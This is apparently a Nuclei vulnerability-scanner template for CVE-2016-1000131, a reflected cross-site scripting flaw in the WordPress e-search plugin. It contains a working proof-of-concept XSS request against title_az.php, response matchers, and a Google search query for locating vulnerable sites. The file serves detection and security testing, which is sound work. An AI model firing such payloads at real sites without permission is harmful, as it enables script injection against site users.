nuclei-templates/cves/2016/CVE-2016-1000131.yaml

44 lines
1.5 KiB
YAML

id: CVE-2016-1000131
info:
name: WordPress e-search <=1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=393
- https://wordpress.org/plugins/e-search
- http://web.archive.org/web/20210123183536/https://www.securityfocus.com/bid/93867/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000131
cwe-id: CWE-79
metadata:
google-query: inurl:"/wp-content/plugins/e-search"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/12